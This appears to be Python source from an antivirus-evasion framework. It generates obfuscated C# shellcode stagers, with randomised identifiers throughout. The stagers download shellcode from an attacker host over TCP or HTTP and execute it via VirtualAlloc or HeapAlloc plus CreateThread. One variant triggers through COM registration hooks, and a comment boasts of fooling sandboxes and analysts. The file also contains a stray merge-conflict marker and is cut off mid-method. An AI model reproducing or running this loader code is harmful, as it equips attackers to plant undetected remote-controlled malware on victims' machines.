        self.payload_source_code = payload_code
        return
    def generate(self) -> None:
        """Build the C# source for a ServicedComponent-hosted TCP stager.

        The emitted source (one string) holds a namespace with two classes:
        a ``ServicedComponent`` whose ``[ComRegisterFunction]`` and
        ``[ComUnregisterFunction]`` methods both call the exec method of the
        second class, and that second class with the P/Invoke declarations,
        a TCP ``getData`` routine, an ``inject`` routine chosen by
        ``INJECT_METHOD`` (``virtual`` or ``heap``) and the exec method that
        wires them together.  Reads ``INJECT_METHOD``, ``LHOST`` and
        ``LPORT`` from ``self.required_options``; the result is stored in
        ``self.payload_source_code`` and nothing is returned.
        """

        # randomize all our variable names, yo'
        classhellcodeName = bypass_helpers.randomString()
        classhellcodeNameTwo = bypass_helpers.randomString()
        namespace = bypass_helpers.randomString()
        key = bypass_helpers.randomString()
        injectName = bypass_helpers.randomString()
        execName = bypass_helpers.randomString()
        # bytearrayName, savedStateName, rand_bool and random_out are drawn
        # but never referenced below.
        bytearrayName = bypass_helpers.randomString()
        funcAddrName = bypass_helpers.randomString()
        savedStateName = bypass_helpers.randomString()
        shellcodeName = bypass_helpers.randomString()
        rand_bool = bypass_helpers.randomString()
        random_out = bypass_helpers.randomString()
        getDataName = helpers.randomString()

        hThreadName = bypass_helpers.randomString()
        threadIdName = bypass_helpers.randomString()
        pinfoName = bypass_helpers.randomString()
        num_tabs_required = 0

        # get random variables for the API imports
        # (16 names are drawn for `r` but the 'virtual' declarations use only
        # r[0..11]; the 'heap' declarations consume all 17 entries of `y`)
        r = [bypass_helpers.randomString() for x in range(16)]
        y = [bypass_helpers.randomString() for x in range(17)]

        #required syntax at the beginning of any/all payloads
        payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;\n"
        payload_code += "namespace {0}\n {{".format(namespace)
        payload_code += "\n\tpublic class {0} : ServicedComponent {{\n".format(
            classhellcodeName)
        # placeholder for legitimate C# program
        # lets add a message box to throw offf sandbox heuristics and analysts :)
        # (the constructor body emitted here is a Console.WriteLine, not a
        # message box)
        payload_code += '\n\t\tpublic {0}() {{ Console.WriteLine("doge"); }}\n'.format(
            classhellcodeName)
        # Both COM (un)registration hooks call the same exec method of the
        # second class; `key` is only the name of their string parameter.
        payload_code += "\n\t\t[ComRegisterFunction]"
        payload_code += "\n\t\tpublic static void RegisterClass ( string {0} )\n\t\t{{\n".format(
            key)
        payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n".format(
            classhellcodeNameTwo, execName)
        payload_code += "\n[ComUnregisterFunction]"
        payload_code += "\n\t\tpublic static void UnRegisterClass ( string {0} )\n\t\t{{\n".format(
            key)
        payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(
            classhellcodeNameTwo, execName)

        # Second class: P/Invoke declarations first, then getData/inject/exec.
        payload_code += "\n\tpublic class {0}\n\t{{".format(
            classhellcodeNameTwo)
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
                r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
                r[10], r[11])
        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
                y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
                y[10], y[11], y[12], y[13], y[14], y[15], y[16])

        hostName = helpers.randomString()
        portName = helpers.randomString()
        ipName = helpers.randomString()
        sockName = helpers.randomString()
        length_rawName = helpers.randomString()
        lengthName = helpers.randomString()
        sName = helpers.randomString()
        total_bytesName = helpers.randomString()
        handleName = helpers.randomString()

        # Emitted getData(host, port): TCP connect (null on failure), read a
        # 4-byte length prefix, then read the body into a buffer with 5 spare
        # leading bytes; byte 0 is set to 0xBF and bytes 1..4 receive the
        # socket handle before the buffer is returned.  The length read from
        # the wire is used as-is for the allocation.
        payload_code += "static byte[] %s(string %s, int %s) {\n" % (
            getDataName, hostName, portName)
        payload_code += "    IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
            ipName, hostName, portName)
        payload_code += "    Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
            sockName)
        payload_code += "    try { %s.Connect(%s); }\n" % (sockName, ipName)
        payload_code += "    catch { return null;}\n"
        payload_code += "    byte[] %s = new byte[4];\n" % (length_rawName)
        payload_code += "    %s.Receive(%s, 4, 0);\n" % (sockName,
                                                         length_rawName)
        payload_code += "    int %s = BitConverter.ToInt32(%s, 0);\n" % (
            lengthName, length_rawName)
        payload_code += "    byte[] %s = new byte[%s + 5];\n" % (sName,
                                                                 lengthName)
        payload_code += "    int %s = 0;\n" % (total_bytesName)
        payload_code += "    while (%s < %s)\n" % (total_bytesName, lengthName)
        payload_code += "    { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
            total_bytesName, sockName, sName, total_bytesName, lengthName,
            total_bytesName, lengthName, total_bytesName)
        payload_code += "    byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
            handleName, sockName)
        payload_code += "    Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
            handleName, sName, sName)
        payload_code += "    return %s;}\n" % (sName)

        # Emitted inject(buf): 'virtual' = VirtualAlloc + Marshal.Copy +
        # CreateThread + WaitForSingleObject; 'heap' = HeapCreate/HeapAlloc +
        # RtlMoveMemory + CreateThread + WaitForSingleObject.  Both skip a
        # null buffer.  NOTE(review): any other INJECT_METHOD value emits no
        # inject method at all, yet the exec method below still calls it, so
        # the generated source would not compile.
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               shellcodeName)
            payload_code += "    if (%s != null) {\n" % (shellcodeName)
            payload_code += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
                funcAddrName, shellcodeName)
            payload_code += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
                shellcodeName, funcAddrName, shellcodeName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (
                hThreadName)
            payload_code += "        UInt32 %s = 0;\n" % (threadIdName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
            payload_code += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
                hThreadName, funcAddrName, pinfoName, threadIdName)
            payload_code += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
                hThreadName)

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               shellcodeName)
            payload_code += "    if (%s != null) {\n" % (shellcodeName)
            payload_code += '       UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
                pinfoName, shellcodeName)
            payload_code += '       UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
                funcAddrName, pinfoName, shellcodeName)
            payload_code += '       RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
                funcAddrName, shellcodeName, shellcodeName)
            payload_code += '       UInt32 {} = 0;\n'.format(threadIdName)
            payload_code += '       IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
                hThreadName, funcAddrName, threadIdName)
            payload_code += '       WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
                hThreadName)

        # randomName is never used; num_tabs_required is reset before
        # senecas_games() supplies the real count.
        randomName = bypass_helpers.randomString()
        num_tabs_required = 0

        # Exec method: senecas_games() returns a code prefix plus the number
        # of blocks it opened (presumably — the helper is not visible here);
        # +3 accounts for the exec method, the class and the namespace opened
        # above, and the closing loop below emits one '}' per level.
        payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
        payload_code2, num_tabs_required = gamemaker.senecas_games(self)
        payload_code = payload_code + payload_code2
        num_tabs_required += 3

        # LHOST/LPORT are dropped into a C# string literal unescaped; this
        # assumes the option values contain no '"' or '\'.
        payload_code += "    byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
            sName, sName, getDataName, self.required_options["LHOST"][0],
            self.required_options["LPORT"][0])
        payload_code += "    %s(%s);\n" % (injectName, sName)

        while (num_tabs_required != 0):
            payload_code += '\t' * num_tabs_required + '}'
            num_tabs_required -= 1

        self.payload_source_code = payload_code
        return
    def generate(self) -> None:
        """Build the C# source for a console TCP stager and store it.

        Emits ``namespace { class { getData; inject; Main; <DllImports> }}``
        as one string.  ``INJECT_METHOD`` (``virtual`` or ``heap``) selects
        both the inject routine and the matching P/Invoke declarations;
        ``LHOST``/``LPORT`` are baked into ``Main``; ``USE_ARYA=y`` passes the
        finished source through ``encryption.arya``.  The result is stored in
        ``self.payload_source_code``; nothing is returned.  Shares most of its
        body with the other TCP ``generate`` variants in this file.
        """

        getDataName = helpers.randomString()
        injectName = helpers.randomString()

        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n"
        payload_code += "namespace %s { class %s {\n" % (
            helpers.randomString(), helpers.randomString())

        hostName = helpers.randomString()
        portName = helpers.randomString()
        ipName = helpers.randomString()
        sockName = helpers.randomString()
        length_rawName = helpers.randomString()
        lengthName = helpers.randomString()
        sName = helpers.randomString()
        total_bytesName = helpers.randomString()
        handleName = helpers.randomString()

        # Emitted getData(host, port): TCP connect (null on failure), read a
        # 4-byte length prefix, then the body into a buffer with 5 spare
        # leading bytes; byte 0 becomes 0xBF and bytes 1..4 the socket handle.
        payload_code += "static byte[] %s(string %s, int %s) {\n" % (
            getDataName, hostName, portName)
        payload_code += "    IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
            ipName, hostName, portName)
        payload_code += "    Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
            sockName)
        payload_code += "    try { %s.Connect(%s); }\n" % (sockName, ipName)
        payload_code += "    catch { return null;}\n"
        payload_code += "    byte[] %s = new byte[4];\n" % (length_rawName)
        payload_code += "    %s.Receive(%s, 4, 0);\n" % (sockName,
                                                         length_rawName)
        payload_code += "    int %s = BitConverter.ToInt32(%s, 0);\n" % (
            lengthName, length_rawName)
        payload_code += "    byte[] %s = new byte[%s + 5];\n" % (sName,
                                                                 lengthName)
        payload_code += "    int %s = 0;\n" % (total_bytesName)
        payload_code += "    while (%s < %s)\n" % (total_bytesName, lengthName)
        payload_code += "    { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
            total_bytesName, sockName, sName, total_bytesName, lengthName,
            total_bytesName, lengthName, total_bytesName)
        payload_code += "    byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
            handleName, sockName)
        payload_code += "    Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
            handleName, sName, sName)
        payload_code += "    return %s;}\n" % (sName)

        # sName is reused as the parameter name of the emitted inject().
        sName = helpers.randomString()
        funcAddrName = helpers.randomString()
        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        # NOTE(review): an INJECT_METHOD value other than 'virtual'/'heap'
        # emits neither inject() nor the DllImport block, while Main still
        # calls inject(); the generated source would then not compile.
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            payload_code += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
                funcAddrName, sName)
            payload_code += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
                sName, funcAddrName, sName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (
                hThreadName)
            payload_code += "        UInt32 %s = 0;\n" % (threadIdName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
            payload_code += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
                hThreadName, funcAddrName, pinfoName, threadIdName)
            payload_code += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
                hThreadName)

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            payload_code += '       UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
                pinfoName, sName)
            payload_code += '       UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
                funcAddrName, pinfoName, sName)
            payload_code += '       RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
                funcAddrName, sName, sName)
            payload_code += '       UInt32 {} = 0;\n'.format(threadIdName)
            payload_code += '       IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
                hThreadName, funcAddrName, threadIdName)
            payload_code += '       WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
                hThreadName)

        # Main(): senecas_games() contributes a code prefix and the count of
        # blocks it opened (presumably — helper not visible here); Main's own
        # brace is closed inline after the inject() call, the loop below
        # closes the senecas blocks.
        sName = helpers.randomString()
        curlyCount = 0
        payload_code += "static void Main(){\n"

        payload_code2, curlyCount = gamemaker.senecas_games(self)
        payload_code = payload_code + payload_code2

        # LHOST/LPORT land in a C# string literal unescaped — assumes they
        # contain no '"' or '\'.
        payload_code += "    byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
            sName, sName, getDataName, self.required_options["LHOST"][0],
            self.required_options["LPORT"][0])
        payload_code += "    %s(%s); }\n" % (injectName, sName)

        while (curlyCount != 0):
            payload_code += '\t' * curlyCount + '}'
            curlyCount -= 1

        # get 12 random variables for the API imports
        # (`y` holds 17 because the 'heap' declarations take 17 names; the
        # trailing "}}" in each template closes the class and the namespace)
        r = [helpers.randomString() for x in range(12)]
        y = [helpers.randomString() for x in range(17)]
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
                r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
                r[10], r[11])
        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
                y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
                y[10], y[11], y[12], y[13], y[14], y[15], y[16])

        # Optional post-processing of the whole source (arya not visible here).
        if self.required_options["USE_ARYA"][0].lower() == "y":
            payload_code = encryption.arya(payload_code)

        self.payload_source_code = payload_code
        return
<<<<<<< HEAD
    def generate(self) -> None:
        """Build the C# source for an HTTP-fetching stager and store it.

        Emits one string holding a namespace/class with: a random-string
        helper, a ``checksum8`` predicate, a ``genHTTPChecksum`` path
        builder, a ``WebClient``-based ``getData``, an ``inject`` routine
        chosen by ``INJECT_METHOD`` (``virtual`` or ``heap``), ``Main``, and
        the P/Invoke declarations.  ``LHOST``/``LPORT`` form the base URL;
        ``USE_ARYA=y`` passes the finished source through ``encryption.arya``.
        The result goes to ``self.payload_source_code``; nothing is returned.
        """

        # imports and namespace setup
        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading;\n"
        payload_code += "namespace %s { class %s {\n" % (helpers.randomString(), helpers.randomString())

        # code for the randomString() function
        # (the alphabet is shuffled with Python's random — not security
        # relevant here, it only varies the emitted source)
        randomStringName = helpers.randomString()
        bufferName = helpers.randomString()
        charsName = helpers.randomString()
        t = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
        random.shuffle(t)
        chars = ''.join(t)

        payload_code += "static string %s(Random r, int s) {\n" %(randomStringName)
        payload_code += "char[] %s = new char[s];\n"%(bufferName)
        payload_code += "string %s = \"%s\";\n" %(charsName, chars)
        payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" %(bufferName, charsName, charsName)
        payload_code += "return new string(%s);}\n" %(bufferName)


        # code for the checksum8() function
        # Emitted predicate: true when the sum of the string's char codes
        # mod 0x100 equals 92.  The fixed value, together with the fixed
        # User-Agent below, is a stable fingerprint of the generated client.
        checksum8Name = helpers.randomString()
        payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" %(checksum8Name)


        # code fo the genHTTPChecksum() function
        # Emitted routine: up to 64 tries of a 3-char random base plus one
        # char from a reshuffled alphabet, returning the first candidate that
        # satisfies checksum8; falls back to the literal "9vXU".
        genHTTPChecksumName = helpers.randomString()
        baseStringName = helpers.randomString()
        randCharsName = helpers.randomString()
        urlName = helpers.randomString()
        random.shuffle(t)
        randChars = ''.join(t)

        payload_code += "static string %s(Random r) { string %s = \"\";\n" %(genHTTPChecksumName,baseStringName)
        payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" %(baseStringName,randomStringName)
        payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" %(randCharsName,randChars)
        payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" %(randCharsName)
        payload_code += "string %s = %s + %s[j];\n" %(urlName,baseStringName,randCharsName)
        payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}"%(checksum8Name,urlName, urlName)


        # code for getData() function
        # Emitted routine: WebClient GET with hard-coded headers; bodies
        # shorter than 100000 bytes yield null, and a WebException is
        # swallowed (the buffer then stays null).
        getDataName = helpers.randomString()
        strName = helpers.randomString()
        webClientName = helpers.randomString()
        sName = helpers.randomString()

        payload_code += "static byte[] %s(string %s) {\n" %(getDataName,strName)
        payload_code += "WebClient %s = new System.Net.WebClient();\n" %(webClientName)
        payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" %(webClientName)
        payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" %(webClientName)
        payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" %(webClientName)
        payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" %(webClientName)
        payload_code += "byte[] %s = null;\n" %(sName)
        payload_code += "try { %s = %s.DownloadData(%s);\n" %(sName, webClientName, strName)
        payload_code += "if (%s.Length < 100000) return null;}\n" %(sName)
        payload_code += "catch (WebException) {}\n"
        payload_code += "return %s;}\n" %(sName)


        # code fo the inject() function to inject shellcode
        # NOTE(review): an INJECT_METHOD value other than 'virtual'/'heap'
        # emits neither inject() nor the DllImport block while Main still
        # calls inject(); the generated source would then not compile.
        injectName = helpers.randomString()
        sName = helpers.randomString()
        funcAddrName = helpers.randomString()
        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += "static void %s(byte[] %s) {\n" %(injectName, sName)
            payload_code += "    if (%s != null) {\n" %(sName)
            payload_code += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" %(funcAddrName, sName)
            payload_code += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" %(sName,funcAddrName, sName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" %(hThreadName)
            payload_code += "        UInt32 %s = 0;\n" %(threadIdName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" %(pinfoName)
            payload_code += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" %(hThreadName, funcAddrName, pinfoName, threadIdName)
            payload_code += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" %(hThreadName)

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            payload_code += "static void %s(byte[] %s) {\n" %(injectName, sName)
            payload_code += "    if (%s != null) {\n" %(sName)
            payload_code += '       UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(pinfoName, sName)
            payload_code += '       UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(funcAddrName, pinfoName, sName)
            payload_code += '       RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(funcAddrName, sName, sName)
            payload_code += '       UInt32 {} = 0;\n'.format(threadIdName)
            payload_code += '       IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, funcAddrName, threadIdName)
            payload_code += '       WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(hThreadName)


        # code for Main() to launch everything
        # senecas_games() supplies a code prefix plus the count of blocks it
        # opened (presumably — helper not visible here); Main's own brace is
        # closed inline, the loop below closes the senecas blocks.
        sName = helpers.randomString()
        randomName = helpers.randomString()
        curlyCount = 0

        payload_code += "static void Main(){\n"

        payload_code2, curlyCount = gamemaker.senecas_games(self)
        payload_code = payload_code + payload_code2

        # The emitted Random is seeded from DateTime.Now.Ticks; LHOST/LPORT
        # go into the URL literal unescaped (assumes no '"' or '\').
        payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" %(randomName)
        payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" %(sName, getDataName, self.required_options["LHOST"][0],self.required_options["LPORT"][0],genHTTPChecksumName,randomName)
        payload_code += "%s(%s);}\n" %(injectName, sName)

        while (curlyCount != 0):
            payload_code += '\t' * curlyCount + '}'
            curlyCount -= 1

        # get random variables for the API imports
        # (12 for 'virtual', 17 for 'heap'; the trailing "}}" closes the
        # class and the namespace)
        r = [helpers.randomString() for x in range(12)]
        y = [helpers.randomString() for x in range(17)]
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
        elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n"""%(y[0],y[1],y[2],y[3],y[4],y[5],y[6],y[7],y[8],y[9],y[10],y[11],y[12],y[13],y[14],y[15],y[16])

        # Optional post-processing of the whole source (arya not visible here).
        if self.required_options["USE_ARYA"][0].lower() == "y":
            payload_code = encryption.arya(payload_code)

        self.payload_source_code = payload_code
        return
    def generate(self) -> None:
        """Build the C# source for a console TCP stager and store it.

        Same structure as the other TCP ``generate`` variants in this file
        (``getData``, ``inject``, ``Main``, then the P/Invoke declarations
        that also close the class and namespace), written with one statement
        per line.  ``INJECT_METHOD`` (``virtual`` or ``heap``) selects the
        inject routine and its declarations; ``LHOST``/``LPORT`` are baked
        into ``Main``; ``USE_ARYA=y`` passes the source through
        ``encryption.arya``.  Stores into ``self.payload_source_code``;
        nothing is returned.
        """

        getDataName = helpers.randomString()
        injectName = helpers.randomString()

        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n"
        payload_code += "namespace %s { class %s {\n" % (helpers.randomString(), helpers.randomString())

        hostName = helpers.randomString()
        portName = helpers.randomString()
        ipName = helpers.randomString()
        sockName = helpers.randomString()
        length_rawName = helpers.randomString()
        lengthName = helpers.randomString()
        sName = helpers.randomString()
        total_bytesName = helpers.randomString()
        handleName = helpers.randomString()

        # Emitted getData(host, port): TCP connect (null on failure), read a
        # 4-byte length prefix, then the body into a buffer with 5 spare
        # leading bytes; byte 0 becomes 0xBF and bytes 1..4 the socket handle.
        payload_code += "static byte[] %s(string %s, int %s) {\n" %(getDataName, hostName, portName)
        payload_code += "    IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" %(ipName, hostName, portName)
        payload_code += "    Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" %(sockName)
        payload_code += "    try { %s.Connect(%s); }\n" %(sockName, ipName)
        payload_code += "    catch { return null;}\n"
        payload_code += "    byte[] %s = new byte[4];\n" %(length_rawName)
        payload_code += "    %s.Receive(%s, 4, 0);\n" %(sockName, length_rawName)
        payload_code += "    int %s = BitConverter.ToInt32(%s, 0);\n" %(lengthName, length_rawName)
        payload_code += "    byte[] %s = new byte[%s + 5];\n" %(sName, lengthName)
        payload_code += "    int %s = 0;\n" %(total_bytesName)
        payload_code += "    while (%s < %s)\n" %(total_bytesName, lengthName)
        payload_code += "    { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" %(total_bytesName, sockName, sName, total_bytesName, lengthName, total_bytesName, lengthName, total_bytesName)
        payload_code += "    byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" %(handleName, sockName)
        payload_code += "    Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" %(handleName, sName, sName)
        payload_code += "    return %s;}\n" %(sName)


        # sName is reused as the parameter name of the emitted inject().
        # NOTE(review): an INJECT_METHOD value other than 'virtual'/'heap'
        # emits neither inject() nor the DllImport block while Main still
        # calls inject(); the generated source would then not compile.
        sName = helpers.randomString()
        funcAddrName = helpers.randomString()
        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += "static void %s(byte[] %s) {\n" %(injectName, sName)
            payload_code += "    if (%s != null) {\n" %(sName)
            payload_code += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" %(funcAddrName, sName)
            payload_code += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" %(sName,funcAddrName, sName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" %(hThreadName)
            payload_code += "        UInt32 %s = 0;\n" %(threadIdName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" %(pinfoName)
            payload_code += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" %(hThreadName, funcAddrName, pinfoName, threadIdName)
            payload_code += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" %(hThreadName)

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            payload_code += "static void %s(byte[] %s) {\n" %(injectName, sName)
            payload_code += "    if (%s != null) {\n" %(sName)
            payload_code += '       UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(pinfoName, sName)
            payload_code += '       UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(funcAddrName, pinfoName, sName)
            payload_code += '       RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(funcAddrName, sName, sName)
            payload_code += '       UInt32 {} = 0;\n'.format(threadIdName)
